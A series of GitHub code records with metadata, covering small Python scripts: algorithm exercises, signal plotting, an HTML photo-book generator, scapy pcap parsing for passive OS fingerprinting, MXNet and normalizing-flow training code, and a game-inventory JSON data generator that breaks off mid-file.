CONFIG.update(yaml.safe_load(config_file) or {})\n        return CONFIG\n    else:\n        try:\n            with open(config_file, 'r') as f:\n                content = yaml.safe_load(f)\n            CONFIG.update(content)\n            return content\n        except IOError as e:\n            e.message = \"Could not open configuration file \\\"{}\\\".\".format(config_file)\n            raise e\n\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\"\"\"Check running times\"\"\")\n    parser.add_argument('--config', help=\"configuration file\", type=str, required=True)\n    args = parser.parse_args()\n\n    main(args)\n","repo_name":"SciLifeLab/standalone_scripts","sub_path":"hiseqX_run_times.py","file_name":"hiseqX_run_times.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"32046434492","text":"#!/usr/bin/python3\n\n# Given an array of characters where each character represents\n# a fruit tree, we are given two baskets. The goal is to put the\n# max number of fruits in each basket, but each basket\n# can only hold one type of fruit.\n\n# We can start with any tree, but can't skip a tree once\n# started. We will pick one fruit from each tree until we cannot.
\n\n# Time complexity: O(N)\n# Space complexity: O(1)\ndef pick_fruit(arr):\n\n    # dictionary to keep track of frequencies\n    baskets = {}\n\n    # maximum length of substring, which represents\n    # total number of fruit collected\n    max_len = 0\n\n    # start of window\n    i = 0\n\n    # j tracks end of window\n    for j in range(len(arr)):\n\n        if arr[j] not in baskets:\n            baskets[arr[j]] = 1\n\n        else:\n            baskets[arr[j]] += 1\n\n        # if the number of unique chars in the dictionary\n        # is greater than 2, then we need to increment i\n        # and remove the corresponding chars from the dictionary\n        while len(baskets) > 2:\n\n            if baskets[arr[i]] == 1:\n                del baskets[arr[i]]\n            else:\n                baskets[arr[i]] -= 1\n\n            i += 1\n\n        max_len = max(max_len, j - i + 1)\n\n    return max_len\n\n\n\nif __name__ == \"__main__\":\n\n    fruit = [\"A\", \"B\", \"C\", \"A\", \"C\"]\n\n    # Expected output: 3\n    # 2 C and 1 A from [\"C\", \"A\", \"C\"]\n    print(pick_fruit(fruit))\n\n\n    fruit = [\"A\", \"B\", \"C\", \"B\", \"B\", \"C\"]\n\n    # Expected output: 5\n    # 3 B and 2 C from [\"B\", \"C\", \"B\", \"B\", \"C\"]\n    print(pick_fruit(fruit))\n","repo_name":"mhichen/Patterns","sub_path":"Sliding_Window/fruits_into_basket.py","file_name":"fruits_into_basket.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28935011030","text":"day = input()\nif day == \"Monday\"\\\n        or day == \"Tuesday\"\\\n        or day == \"Wednesday\" \\\n        or day == \"Thursday\" \\\n        or day == \"Friday\":\n    print(\"Working day\")\nelif day == \"Saturday\" or day == \"Sunday\":\n    print(\"Weekend\")\nelse:\n    print(\"Error\")","repo_name":"Benkolov/Python-Basic-Soft-Uni-07.22","sub_path":"01.Lab/03.Conditional_statements_advanced_lab/weekend_or_working_day.py","file_name":"weekend_or_working_day.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"31995687647","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef create_sin_wave(cycles, resolution):\n    length = np.pi * 2 * cycles\n    return np.sin(np.arange(0, length, length/resolution))\n\nstart_time = 0\nend_time = 1\nsample_rate = 1000\ntime = np.arange(start_time, end_time, 1/sample_rate)\ntheta = 0\nfrequency = 100\namplitude = 1\nsinewave = amplitude * np.sin(2 * np.pi * frequency * time + theta)\nplt.figure(figsize=(20, 6), dpi=80)\nplt.plot(sinewave)","repo_name":"JackHaek/FFT","sub_path":"FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16672366361","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os import listdir\nfrom os.path import join\nfrom re import match\n\nif __name__ == \"__main__\":\n    DATA_DIR = \"imgs\"\n    HTML_TEMPLATE = \"template.html\"\n    BOOK_NAME = \"iLikeYou\"\n    BODY_TAG = \"<!-- BODY -->\"  # marker line in template.html that gets swapped for the generated body\n    BODY = \"\"\n\n    for imgFilename in [f for f in sorted(listdir(DATA_DIR)) if f.endswith(\".png\")]:\n        fullPath = join(DATA_DIR, imgFilename)\n\n        matchDates = match(r\"^[0-9]{2}_([0-9]{4})([0-9]{2})\\-?([0-9]{4})?([0-9]{2})?.png\", imgFilename)\n        fromYear, fromMonth, toYear, toMonth = matchDates.groups()\n\n        mDate = fromMonth + \"/\" + fromYear\n        mDate += \" - \" + toMonth + \"/\" + toYear if toYear is not None else \"\"\n\n        # build a simple image block per photo\n        BODY += \"<div class='photo'>\\n\"\n        BODY += \"  <img src='%s' />\\n\"%fullPath\n        BODY += \"  <div class='date'>%s</div>\\n\"%mDate\n        BODY += \"</div>\\n\"\n\n\n    # write output file\n    with open(BOOK_NAME+\".html\", 'w') as out:\n        with open(HTML_TEMPLATE) as temp:\n            for line in temp.readlines():\n                if BODY_TAG in line:\n                    line = BODY\n                out.write(line)\n","repo_name":"thiagohersan/iLikeYou-book","sub_path":"prepBook.py","file_name":"prepBook.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30310895009","text":"#!/usr/bin/python\nfrom scapy.all import *\n\n# Change the path of the output file according to your system\nWindows_OS = \"C:/../../../../Windows_OS.txt\"\n# Change the location of the pcap file to where you have stored it on your PC\npcap_file = \"C:/../../../../http_google.pcap\"\n\nf1 = open(Windows_OS, 'a+')\n\ntry:\n    print('[+] Reading and parsing pcap file: %s' % pcap_file)\n    a = rdpcap(pcap_file)\n    #print(a)\nexcept Exception as e:\n    print('Something went wrong while opening/reading the pcap file.' '\\n\\nThe error message is: %s' % e)\n    exit(0)\n\n#print(len(a))\nx = 0\nwhile x < len(a):\n\n    # Re-create the entire packet from the pcap file and then write it to our file\n    #print(a[x].command())\n    f1.write(a[x].command())\n    raw_packet = str(a[x].command())\n    if raw_packet.count(\"Windows\") > 0:\n        print(\"--------------\")\n        print(\"| PACKET \" + str(x + 1) + \" |\")\n        print(\"--------------\")\n        print(\"Windows Operating system\")\n        f1.write(\"-------------\")\n        f1.write(\"\\n\")\n        f1.write(\"| PACKET \" + str(x + 1) + \" |\")\n        f1.write(\"\\n\")\n        f1.write(\"-------------\")\n        f1.write(\"\\n\")\n        f1.write(\"Windows Operating System\")\n        f1.write(\"\\n\")\n        f1.write(\"\\n\")\n    x += 1\nf1.close()\n","repo_name":"sarveshkapre/PCAP_Analyzer","sub_path":"Passive Fingerprinting/Identify_Windows_OS.py","file_name":"Identify_Windows_OS.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"14067141707","text":"import find_mxnet\nimport mxnet as mx\nimport logging\nimport os\nimport getpass\n\ndef fit(args, network, data_loader, batch_end_callback=None):\n    # kvstore\n    kv = mx.kvstore.create(args.kv_store)\n\n    # logging\n    head = '%(asctime)-15s Node[' + str(kv.rank) + '] %(message)s'\n    if 'log_file' in args and args.log_file is not None:\n        log_file = args.log_file\n        log_dir = args.log_dir\n        log_file_full_name = os.path.join(log_dir, log_file)\n        if not os.path.exists(log_dir):\n            os.mkdir(log_dir)\n        logger = logging.getLogger()\n        handler = logging.FileHandler(log_file_full_name)\n        formatter = logging.Formatter(head)\n        handler.setFormatter(formatter)\n        logger.addHandler(handler)\n        logger.setLevel(logging.DEBUG)\n        logger.info('start with arguments %s', args)\n    else:\n        logging.basicConfig(level=logging.DEBUG, format=head)\n        logging.info('start with arguments %s', args)\n\n    # load model\n    kv_store_type = \"\"\n    if args.kv_store == \"dist_sync\":\n        kv_store_type = \"bsp\"\n    elif args.kv_store == \"dist_async\":\n        kv_store_type = \"asp\"\n    elif args.kv_store == \"dist_gsync\":\n        kv_store_type = \"gsp\"\n    elif args.kv_store == \"dist_ssync\":\n        kv_store_type = \"ssp\"\n    user = getpass.getuser()\n    network_symbol = None\n    if args.network == \"inception-bn-28-small\":\n        network_symbol = \"inception_bn_small\"\n    elif args.network == \"inception-bn\":\n        network_symbol = \"inception\"\n    elif args.network == \"3conv\":\n        network_symbol = \"3conv\"\n\n    if not os.path.exists(\"/home/{}/mxnet_model/model/{}/{}/{}\".format(user, args.dataset, network_symbol, 
kv_store_type)):\n os.makedirs(\"/home/{}/mxnet_model/model/{}/{}/{}\".format(user, args.dataset, network_symbol, kv_store_type))\n\n model_prefix = \"/home/{}/mxnet_model/model/{}/{}/{}/{}-{}-{}-{}\".format(user, args.dataset, network_symbol, kv_store_type, kv_store_type, args.dataset, network_symbol, kv.rank)\n\n model_args = {}\n if args.retrain:\n tmp = mx.model.FeedForward.load(model_prefix, args.model_load_epoch)\n model_args = {'arg_params' : tmp.arg_params,\n 'aux_params' : tmp.aux_params,\n 'begin_epoch' : args.model_load_epoch}\n # TODO: check epoch_size for 'dist_sync' yegeyan 2017.1.13\n epoch_size = args.num_examples / args.batch_size\n model_args['begin_num_update'] = epoch_size * args.model_load_epoch\n # save model\n checkpoint = None if not args.savemodel else mx.callback.do_checkpoint(model_prefix)\n\n # data\n (train, val) = data_loader(args, kv)\n\n # train\n devs = mx.cpu() if args.gpus is None else [\n mx.gpu(int(i)) for i in args.gpus.split(',')]\n\n epoch_size = args.num_examples / args.batch_size\n batch_num = args.num_examples / args.batch_size #yegeyan 2016.12.13\n groups_path = '/home/' + getpass.getuser() + '/MXNet-G/example/image-classification/groups'\n group_num = len(open(groups_path, 'rU').readlines()) #yegeyan 2016.12.13\n \n if args.kv_store == 'dist_sync':\n epoch_size /= kv.num_workers\n batch_num /= kv.num_workers\n model_args['epoch_size'] = epoch_size\n\n if args.kv_store == 'dist_async' or args.kv_store == 'dist_ssync':\n epoch_size /= kv.num_workers\n model_args['epoch_size'] = epoch_size\n \n '''yegeyan 2016.12.13'''\n if args.kv_store == 'dist_gsync':\n if args.data_allocator == 1:\n epoch_size *= args.data_proportion\n batch_num = batch_num * group_num / kv.num_workers\n model_args['epoch_size'] = epoch_size\n else:\n epoch_size /= kv.num_workers\n #batch_num /= kv.num_workers\n batch_num = batch_num * group_num / kv.num_workers\n model_args['epoch_size'] = epoch_size\n\n if 'lr_factor' in args and args.lr_factor < 1:\n model_args['lr_scheduler'] = mx.lr_scheduler.FactorScheduler(\n step = max(int(batch_num * args.lr_factor_epoch), 1), #yegeyan 2016.12.13\n factor = args.lr_factor)\n\n if 'clip_gradient' in args and args.clip_gradient is not None:\n model_args['clip_gradient'] = args.clip_gradient\n\n # disable kvstore for single device\n if 'local' in kv.type and (\n args.gpus is None or len(args.gpus.split(',')) is 1):\n kv = None\n\n model = mx.model.FeedForward(\n ctx = devs,\n symbol = network,\n num_epoch = args.num_epochs,\n learning_rate = args.lr,\n momentum = 0.9,\n wd = 0.00001,\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34),\n **model_args)\n\n eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n for top_k in [5, 10, 20]:\n eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n #yegeyan 2017.1.4\n val_eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n for top_k in [5, 10, 20]:\n val_eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n\n if batch_end_callback is not None:\n if not isinstance(batch_end_callback, list):\n batch_end_callback = [batch_end_callback]\n else:\n batch_end_callback = []\n batch_end_callback.append(mx.callback.Speedometer(args.batch_size, 50))\n\n\n model.fit(\n X = train,\n eval_data = val,\n eval_metric = eval_metrics,\n val_eval_metric = val_eval_metrics, #yegeyan 2017.1.4\n kvstore = kv,\n batch_end_callback = batch_end_callback,\n epoch_end_callback = checkpoint,\n hostname = args.hostname, #yegeyan 2016.10.6\n 
dataset = args.dataset,\n        staleness = args.staleness,\n        network_name = args.network,\n        lr = args.lr)  # yegeyan 2017.5.15\n","repo_name":"CGCL-codes/MXNet-G","sub_path":"example/image-classification/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"}
{"seq_id":"40558525331","text":"import torch.nn as nn\nimport FrEIA.framework as Ff\nimport FrEIA.modules as Fm\n\n\nclass FlowModule(nn.Module):\n    \"\"\"Module combining all blocks for the FlowModule\n    \"\"\"\n\n    def __init__(self, subnet_architecture='conv_like', n_flowblocks=8):\n        super(FlowModule, self).__init__()\n        self.inn = Ff.SequenceINN(1024, 16, 16)\n        for k in range(n_flowblocks):\n            if subnet_architecture == 'conv_like':\n                self.inn.append(Fm.AllInOneBlock, subnet_constructor=FlowModule.subnet_conv_3x3_1x1, permute_soft=False)\n            if subnet_architecture == 'resnet_like':\n                self.inn.append(Fm.AllInOneBlock, subnet_constructor=FlowModule.Conv3x3_res_1x1, permute_soft=False)\n\n\n    class Conv3x3_res_1x1(nn.Module):\n        \"\"\"A subnet choice for the coupling layer in the flow module:\n        \"ResNet-type network with one 3 × 3 convolution layer with batch normalization and ReLU function,\n        and a shortcut connection with 1 × 1 convolution will be added as the output.\" (Zhao et al., 2023)\n        \"\"\"\n        def __init__(self, size_in, size_out):\n            super().__init__()\n            self.conv = nn.Conv2d(size_in, size_out, kernel_size=3, padding='same', bias=True)\n            self.bn = nn.BatchNorm2d(size_out)\n            self.relu = nn.ReLU(inplace=True)\n            self.res = nn.Conv2d(size_in, size_out, kernel_size=1, bias=False)\n\n        def forward(self, x):\n            output = self.conv(x)\n            output = self.bn(output)\n            output = self.relu(output)\n            res = self.res(x)\n            return output + res\n\n\n\n    def subnet_conv_3x3_1x1(c_in, c_out):\n        \"\"\"A subnet choice for the coupling layer in the flow module:\n        \"based on (Yu et al., 2021), for which each block contains two convolutional\n        layers with ReLU activation function, and the corresponding kernel size is 3 × 3 and 1 × 1 respectively.\" (Zhao et al., 2023)\n        \"\"\"\n        return nn.Sequential(nn.Conv2d(c_in, 256, 3, padding=1), nn.ReLU(),\n                             nn.Conv2d(256, c_out, 1))\n\n\n    def forward(self, x):\n        z, log_jac_det = self.inn(x)\n        return z, log_jac_det\n\n\n    def reverse(self, z):\n        x_rev, log_jac_det_rev = self.inn(z, rev=True)\n        return x_rev, log_jac_det_rev\n","repo_name":"pimpraat/ae_flow","sub_path":"src/model/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"22669640563","text":"import os\nimport json\nimport random\n\n\nclass InventoryObject:\n    def __init__(self, objetoId, nombre, stack, precio, tipo, tipoEsp):\n        self.objetoId = objetoId\n        self.nombre = nombre\n        self.stack = stack\n        self.precio = precio\n        self.tipo = tipo\n        self.tipoEsp = tipoEsp\n\n    def get_json(self):\n        return json.dumps(self.get_dict())\n\n    def get_dict(self):\n        dict_values = {\"_id\": self.objetoId,\n                       \"nombre\": self.nombre,\n                       \"stack\": self.stack,\n                       \"precio\": self.precio,\n                       \"tipo\": self.tipo,\n                       \"tipoEsp\": self.tipoEsp\n                       }\n        return dict_values\n\n\nclass MaterialObject:\n    def __init__(self, nombre, stack, precio, tipo, tipoEsp):\n        global material_id_count\n        global all_objects\n\n        self.inventoryObject = InventoryObject(\"mat\" + str(material_id_count), nombre, stack, precio, tipo, tipoEsp)\n        material_id_count += 1\n\n        
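# register the new object's dict in the module-level all_objects list so that write_file can later dump it to objetos.json\n        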
all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n\n return base_dict\n\n\nclass MuebleObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, color, conjunto):\n global mueble_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"mu\" + str(mueble_id_count), nombre, stack, precio, tipo, tipoEsp)\n mueble_id_count += 1\n\n self.color = color\n self.conjunto = conjunto\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"color\"] = self.color\n base_dict[\"conjunto\"] = self.conjunto\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass PropObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, comestible):\n global prop_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"prop\" + str(prop_id_count), nombre, stack, precio, tipo, tipoEsp)\n prop_id_count += 1\n\n self.comestible = comestible\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"comestible\"] = self.comestible\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass EquipableObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, lugar_eq):\n global equipable_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"equi\" + str(equipable_id_count), nombre, stack, precio, tipo, tipoEsp)\n equipable_id_count += 1\n\n self.lugar_eq = lugar_eq\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"lugar_eq\"] = self.lugar_eq\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass ColeccionableObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, estacion, tamanio, localizacion, rareza):\n global coleccionable_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"col\" + str(coleccionable_id_count), nombre, stack, precio, tipo,\n tipoEsp)\n coleccionable_id_count += 1\n\n self.estacion = estacion\n self.tamanio = tamanio\n self.localizacion = localizacion\n self.rareza = rareza\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"estacion\"] = self.estacion\n base_dict[\"tamanio\"] = self.tamanio\n base_dict[\"localizacion\"] = self.localizacion\n base_dict[\"rareza\"] = self.rareza\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\n# Globals\nfile_path = os.path.dirname(__file__) + \"\\\\Json\\\\\"\n\ncasas_path = file_path + \"casas.json\"\njugadores_path = file_path + \"jugadores.json\"\nisla_path = file_path + \"islas.json\"\nobjeto_path = file_path + \"objetos.json\"\n\nplayer_id_count = 0\nmueble_id_count = 0\ncoleccionable_id_count = 0\nmaterial_id_count = 0\nprop_id_count = 0\nequipable_id_count = 0\n\npersonaje_id_count = 0\n\ncasa_id_count = 0\n\nisla_id_count = 0\n\nedificio_id_count = 0\n\nvecino_id_count = 0\n\nall_objects = []\nall_casas = []\nall_jugadores = []\nall_vecinos = []\n\n\ndef get_random_color():\n random_value = random.randint(0, 5)\n color = \"\"\n if random_value == 0:\n color = \"Blanco\"\n elif random_value == 1:\n color = \"Rojo\"\n elif random_value == 2:\n color = \"Amarillo\"\n elif random_value == 3:\n color = \"Azul\"\n elif random_value == 4:\n color = \"Marron\"\n elif random_value == 
5:\n color = \"Rosa\"\n\n return color\n\n\ndef get_adjective():\n adjectives = [\"Genial\", \"Mediocre\", \"del Monton\", \"Comun\", \"Impresionante\", \"muy Cuqui\", \"Cuqui\",\n \"Curioso\", \"Interesante\", \"sin Mas\", \"Correcto\", \"Atractivo\", \"Calido\", \"Precioso\",\n \"Azulado\", \"de Campeones\", \"Elegante\", \"Estilizado\", \"Magnifico\", \"Chachi\", \"Medio Roto\",\n \"Memorable\", \"que da que pensar\", \"Pijito\", \"Chismoso\", \"de Locos\", \"Perfecto\", \"Impecable\",\n \"para cogerle carinio\", \"Especial\", \"muy Especial\", \"Vistosito\", \"Regu\", \"que no esta mal\",\n \"un poco Hortera\", \"Hortera\", \"de Buen Gusto\"]\n\n return adjectives[random.randint(0, len(adjectives) - 1)]\n\n\ndef get_material_dict_list(size):\n dict_list = []\n\n names = [\"Piedra\", \"Pepita de Oro\", \"Madera\", \"Madera dura\", \"Madera blanda\", \"Hierro\"]\n stacks = [10, 20, 100, 200, 300]\n precios = [10, 100, 150, 200, 250, 300, 500]\n\n for i in range(size):\n name = names[random.randint(0, len(names) - 1)]\n stack = stacks[random.randint(0, len(stacks) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n tipo = \"Material\"\n tipoEsp = name\n\n dict_list.append(MaterialObject(name + \" \" + get_adjective(), stack, precio, tipo, tipoEsp).get_dict())\n\n return dict_list\n\n\ndef get_prop_dict_list(size):\n dict_list = []\n\n names = [\"Margarita\", \"Rosa\", \"Petunia\", \"Geranio\",\n \"Romero\", \"Lavanda\", \"Tomillo\", \"Ajenjo\", \"Hierbabuena\",\n \"Roble\", \"Manzano\", \"Abeto\", \"Pino\", \"Cipres\", \"Melocotonero\",\n \"Roca\", \"Amatista\", \"Caliza\", \"Marmol\", \"Arenisca\", \"Silex\",\n \"Naranja\", \"Manzana\", \"Uva\", \"Ciruela\", \"Tomate\"\n ]\n stacks = [10, 20, 100, 200, 300]\n precios = [10, 100, 150, 200, 250, 300, 500]\n tipos = [\"Flor\", \"Flor\", \"Flor\", \"Flor\",\n \"Arbusto\", \"Arbusto\", \"Arbusto\", \"Arbusto\", \"Arbusto\",\n \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\",\n \"Roca\", \"Roca\", \"Roca\", \"Roca\", \"Roca\", \"Roca\",\n \"Fruta\", \"Fruta\", \"Fruta\", \"Fruta\", \"Fruta\"\n ]\n comestibles = [False, False, False, False,\n False, False, False, False, False,\n False, False, False, False, False, False,\n False, False, False, False, False, False,\n True, True, True, True, True]\n\n tipo = \"Prop\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = stacks[random.randint(0, len(stacks) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n\n dict_list.append(PropObject(name, stack, precio, tipo, tipoEsp, comestibles[name_i]).get_dict())\n\n return dict_list\n\n\ndef get_equip_dict_list(size):\n dict_list = []\n\n names = [\"Fedora\", \"Gorrita\", \"Sombrero de Ala\", \"Sombrero de paja\", \"Visera\",\n \"Blusa\", \"Jersey\", \"Camisa Hawaiana\", \"Chaleco\", \"Camisa\",\n \"Leggins\", \"Pantaloncito corto\", \"Kilt\", \"Chandal\", \"Falda\", \"Vaqueros\",\n \"Taconazo\", \"Zapatillas\", \"Sandalia\", \"Zuecos\", \"Chanclas\", \"Botas\",\n \"Red\", \"Pico\", \"Pala\", \"Cania\", \"Lupa\"\n ]\n precios = [10, 100, 150, 200, 250, 300, 500, 1000, 2000, 2750, 5000]\n tipos = [\"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Herramienta\", \"Herramienta\", \"Herramienta\", \"Herramienta\", \"Herramienta\"\n ]\n\n 
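# note: lugar_equips below is parallel to names and tipos, so the single random index name_i picks a consistent name/type/slot combination\n    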
lugar_equips = [\"Cabeza\", \"Cabeza\", \"Cabeza\", \"Cabeza\", \"Cabeza\",\n \"Torso\", \"Torso\", \"Torso\", \"Torso\", \"Torso\",\n \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\",\n \"Pies\", \"Pies\", \"Pies\", \"Pies\", \"Pies\", \"Pies\",\n \"Manos\", \"Manos\", \"Manos\", \"Manos\", \"Manos\"]\n\n tipo = \"Equipable\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = 1\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n lugar_equip = lugar_equips[name_i]\n\n dict_list.append(EquipableObject(name, stack, precio, tipo, tipoEsp, lugar_equip).get_dict())\n\n return dict_list\n\n\ndef get_col_dict_list(size):\n dict_list = []\n\n names = [\"Craneo\", \"Amonites\", \"Hueso\", \"DinoHueso\", \"Trilobites\",\n \"Carpa\", \"Palometa\", \"Pez Sable\", \"Tiburon\", \"Mero\",\n \"BichoPalo\", \"Mariposa\", \"Hormiguita\", \"Escarabajo\", \"Escararriba\"\n ]\n precios = [1000, 2000, 2750, 5000, 6000, 10000]\n tipos = [\"Fosil\", \"Fosil\", \"Fosil\", \"Fosil\", \"Fosil\",\n \"Pez\", \"Pez\", \"Pez\", \"Pez\", \"Pez\",\n \"Insecto\", \"Insecto\", \"Insecto\", \"Insecto\", \"Insecto\"\n ]\n\n localizations = [\"Tierra\", \"Bajo tierra\", \"Tierra\", \"Bajo Tierra\", \"Bajo Tierra\",\n \"Rio\", \"Mar\", \"Mar\", \"Mar\", \"Cascada\",\n \"Estanque\", \"Valle\", \"Boca del Rio\", \"Colina\", \"Colina\"]\n\n estaciones = [\"Primavera\", \"Invierno\", \"Verano\", \"Otonio\"]\n\n tipo = \"Coleccionable\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = 1\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n estacion = estaciones[random.randint(0, len(estaciones) - 1)]\n tamanio = random.randint(1, 5)\n localization = localizations[name_i]\n rareza = random.randint(1, 10)\n\n dict_list.append(\n ColeccionableObject(name, stack, precio, tipo, tipoEsp, estacion, tamanio, localization, rareza).get_dict())\n\n return dict_list\n\n\ndef get_mueble_dict_list(size):\n dict_list = []\n\n names = [\"Silla\", \"Mesa\", \"Mesita\", \"Armario\", \"Estanteria\", \"Cama\"]\n precios = [10, 100, 150, 200, 250, 300, 500]\n tipo = \"Mueble\"\n conjuntos = [\"Congelado\", \"Dorado\", \"Setas\", \"Flor de cerezo\", \"Bambu\", \"Mimbre\", \"Restaurante\",\n \"Imperial\",\n \"Flores\", \"Linda\", \"Mariana\", \"Veraniego\", \"Frutas\", \"Zodiaco\", \"Universitario\"]\n\n stack = 1\n for i in range(size):\n name = names[random.randint(0, len(names) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n color = get_random_color()\n tipoEsp = name\n conjunto = conjuntos[random.randint(0, len(conjuntos) - 1)]\n\n dict_list.append(\n MuebleObject(name + \" \" + get_adjective(), stack, precio, tipo, tipoEsp, color, conjunto).get_dict())\n\n return dict_list\n\n\ndef write_file(file, values):\n file = open(file, \"w\")\n file.write(json.dumps(values))\n file.close()\n\n\ndef find_casa_by_id(casa_id):\n global all_casas\n casa_index = casa_id.replace('c', \"\")\n casa_index = int(casa_index)\n\n return all_casas[casa_index]\n\n\ndef get_casa():\n global casa_id_count\n global casas_list\n global all_casas\n\n casa_dict = {\"_id\": \"c\" + str(casa_id_count),\n \"colorFachada\": get_random_color(),\n \"colorTejado\": get_random_color(),\n\n \"inventarioCasa\": (get_col_dict_list(random.randint(0, 5))\n + get_equip_dict_list(random.randint(0, 5))\n + 
get_prop_dict_list(random.randint(0, 5))\n + get_material_dict_list(random.randint(0, 5))\n + get_mueble_dict_list(random.randint(0, 5))\n )\n }\n\n casa_id_count += 1\n all_casas.append(casa_dict)\n\n return casa_dict\n\n\ndef get_player():\n global jugadores_path\n global player_id_count\n global all_players\n global all_vecinos\n\n nombres = [\"Pepito\", \"Juana\", \"Jennifer\", \"Stella\", \"Antonio\", \"Marco\", \"Marcela\", \"Diego\", \"Dolores\", \"Lola\",\n \"Pedrito\", \"Jose\", \"Stuart\", \"John\", \"Harry\",\n \"Constantino\", \"Miguel\", \"Carlitos\", \"Isabela\", \"Elisa\", \"Ludwig\", \"Caluro\", \"Oscar\", \"Solaire\", \"Largo\",\n \"Daniel\", \"Julio\", \"Alfonso\", \"Humberto\",\n \"Roberto\", \"Alicia\", \"Ana\", \"Dolly\", \"Yerma\", \"Eva\", \"Ivan\", \"Alejandro\",\n \"David\", \"Elena\", \"Carmen\", \"Joseph\", \"Charlie\", \"Elias\", \"Pablito\",\n \"Laura\", \"Carolina\", \"Adrian\", \"Francisco\", \"Sara\", \"Julia\", \"Paula\", \"Sofia\", \"Dorotea\", \"Lupita\",\n \"Josefa\"]\n\n bayas_list = [1000, 2000, 3000, 12000]\n\n player_id_count += 1\n nombre = nombres[player_id_count % len(nombres)]\n\n casa = get_casa()\n\n bayas = bayas_list[random.randint(0, len(bayas_list) - 1)]\n millas = bayas_list[random.randint(0, len(bayas_list) - 1)]\n\n inventario = get_mueble_dict_list(random.randint(0, 3)) + \\\n get_equip_dict_list(random.randint(0, 10)) + \\\n get_col_dict_list(random.randint(0, 3)) + \\\n get_material_dict_list(random.randint(0, 3)) + \\\n get_prop_dict_list(random.randint(0, 3))\n\n vecinos = []\n\n jugador_dict = {\n \"_id\": \"j\" + str(player_id_count),\n \"nombre\": nombre,\n \"cumpleanios\": str(random.randint(1, 29)) + \"-\" + str(random.randint(1, 12)) + \"-\" + str(\n random.randint(1990, 2005)),\n \"casa\": casa[\"_id\"],\n \"bayas\": bayas,\n \"millas\": millas,\n\n \"inventarioObjetos\": inventario,\n \"vecinos\": vecinos\n }\n\n all_jugadores.append(jugador_dict)\n\n return jugador_dict\n\n\ndef write_islas(isla_count):\n global isla_path\n global edificio_id_count\n global all_casas\n global isla_id_count\n global personaje_id_count\n\n islas = []\n nombres = [\"AlcorOn\", \"SouthPeru\", \"MostToLess\", \"TorriHoes\", \"WestMadriz\"]\n hemisferios = [\"N\", \"S\"]\n\n fechas = [\"10-5-2022\", \"9-5-2022\", 